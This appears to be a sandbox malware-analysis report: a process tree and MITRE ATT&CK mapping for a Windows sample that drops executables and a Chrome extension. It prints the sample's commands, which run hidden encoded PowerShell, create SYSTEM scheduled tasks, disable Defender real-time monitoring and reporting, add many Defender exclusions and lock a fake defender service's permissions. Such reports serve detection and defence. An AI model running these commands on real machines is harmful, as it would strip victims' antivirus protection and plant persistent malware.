- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:1668
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2508

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2496

C:\Windows\system32\taskeng.exe
taskeng.exe {736C729B-E8C4-4358-A060-7AF487A2811E} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1572
- C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\uUVSWZe.exe
  C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\uUVSWZe.exe cj /Cgsite_idUrU 385118 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:3052
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gzFdXMERj"
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gzFdXMERj" /SC once /ST 02:10:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:704
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gzFdXMERj"
    3⤵
    PID:2156
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1592
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      PID:1036
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gBEDazNlK"
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gBEDazNlK" /SC once /ST 01:48:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2476
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gBEDazNlK"
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2448
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2748
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\RZfGRCgJsrDIEOco\gCMrplyS\CmtENSFyirNNHwQe.wsf"
    3⤵
    PID:2220
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1536
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2156
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2672
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2880
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2264
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2720
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:952
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2260
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1676
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1092
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1128
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2180
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2888
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2596
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1280
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2924
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:704
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2752
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1872
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1800
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1848
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1420
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1744
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1220
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:448
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:584
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2964
    - - C:\Windows\SysWOW64\reg.exe
        
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
        5⤵
        
        PID:1760
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2296
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2080
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1648
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2972
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1740
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2940
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2504
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1692
    - - C:\Windows\SysWOW64\reg.exe
        
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
        5⤵
        Windows security bypass
        
        PID:2504
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      Windows security bypass
      PID:1036
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "ggIWaRpkU"
    3⤵
    PID:2216
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ggIWaRpkU" /SC once /ST 00:52:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1824
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\RZfGRCgJsrDIEOco\gCMrplyS\CmtENSFyirNNHwQe.wsf"
    3⤵
    PID:1308
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2696
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ggIWaRpkU"
    3⤵
    PID:2292
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "YsLxjqvMZrWymyIEG"
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "YsLxjqvMZrWymyIEG" /SC once /ST 01:16:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\mKZWjXr.exe\" s7 /cksite_idPvx 385118 /S" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:2968
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    PID:2088
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    - Windows security bypass
    - Windows security modification
    PID:2964
- C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\mKZWjXr.exe
  C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\mKZWjXr.exe s7 /cksite_idPvx 385118 /S
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops Chrome extension
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  PID:576
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:2600
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bwKBwqZYjkqxftWshF"
    3⤵
    PID:936
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KCGdmeQdU\ybEvSx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SMPpzaSdDqsJvHF" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:704
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "SMPpzaSdDqsJvHF"
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "SMPpzaSdDqsJvHF"
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "KVEvoYrDZKLqM2" /F /xml "C:\ProgramData\uqeRQcQeSVSWnHVB\KkGeuut.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:936
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "znrIDUvoucqewg" /F /xml "C:\Program Files (x86)\IoHaAJhEDYhU2\JmhoWry.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:3044
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "RHUfDusjVndeEILcZ2" /F /xml "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\emZkybo.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:2772
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "SMPpzaSdDqsJvHF2" /F /xml "C:\Program Files (x86)\KCGdmeQdU\jXxZReY.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:1628
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "BxzpJXegsLHBOSWsuyU2" /F /xml "C:\Program Files (x86)\FohpjzYDshfCC\yqyYkJN.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:1556
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "EtrQGzrpWMpnyWxNE"
    3⤵
    PID:2416
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "EtrQGzrpWMpnyWxNE" /SC once /ST 00:01:31 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\RZfGRCgJsrDIEOco\xYvwbJKg\QApWFWe.dll\",#1 /bxsite_idMzv 385118" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:2604
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "YsLxjqvMZrWymyIEG"
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    - Windows security bypass
    - Windows security modification
    PID:1692
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:2196
- C:\Windows\system32\rundll32.EXE
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RZfGRCgJsrDIEOco\xYvwbJKg\QApWFWe.dll",#1 /bxsite_idMzv 385118
  2⤵
  PID:2496
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RZfGRCgJsrDIEOco\xYvwbJKg\QApWFWe.dll",#1 /bxsite_idMzv 385118
    3⤵
    - Blocklisted process makes network request
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    PID:2888
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "EtrQGzrpWMpnyWxNE"
      4⤵
      PID:2696

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2924

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-47244694-20504640811674530456557187890-913577625-246720357721615658-819379304"
1⤵
- Executes dropped EXE
PID:2848

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1740

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
1⤵
PID:2464

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:32
1⤵
PID:2528

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:32
1⤵
PID:1824

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-357722986-540743928-1737151841-1859805418135013082712366285811685131086-2101939853"
1⤵
PID:2748

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1014590540671030439-9186851635895912-106760392619253245-4874147911161608614"
1⤵
PID:1764

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "7148471665862370501987321439-1248076222494054622-1487516430-1227970907-1691546067"
1⤵
PID:2580

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1020

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-6646287801806879495-1975152029783777135-1138206462543815579-5350619182094626493"
1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
PID:2688

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2058597979990502944-33819912-859430866739707071726422561-1876632414-980635979"
1⤵
PID:1752

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
1⤵
PID:2236

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
1⤵
- Windows security bypass
PID:892

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
1⤵
- Windows security bypass
PID:2672

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1484

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
1⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:828

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
1⤵
PID:1532

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-276565532117118597613143517171908301755-12296511031484739115-348442317460341139"
1⤵
PID:1800

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
1⤵
PID:2368

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-409153162-19134499431352114220187322104516231048671458086722127264994-155212886"
1⤵
PID:1872

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
1⤵
- Windows security bypass
PID:1220

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-20176664301472329578748835999-1517533445-12097745171130559425674226772114376750"
1⤵
PID:1848

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "97380599-68974940612398900526013629272070017806702843615-1205543606-42480228"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Windows security bypass
PID:2528

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "638577799245602338203947241433034097-83969925616556505911163251960-1729050915"
1⤵
PID:2148

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "436951367-1679241235692271524-523238569-760288572025429998-581196837-2053817995"
1⤵
- Modifies data under HKEY_USERS
PID:2220

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1256011160-1463814651-243376801-13259240621491230962-1595044732-3533840091406486838"
1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2464

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
1⤵
- Windows security bypass
PID:1536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls
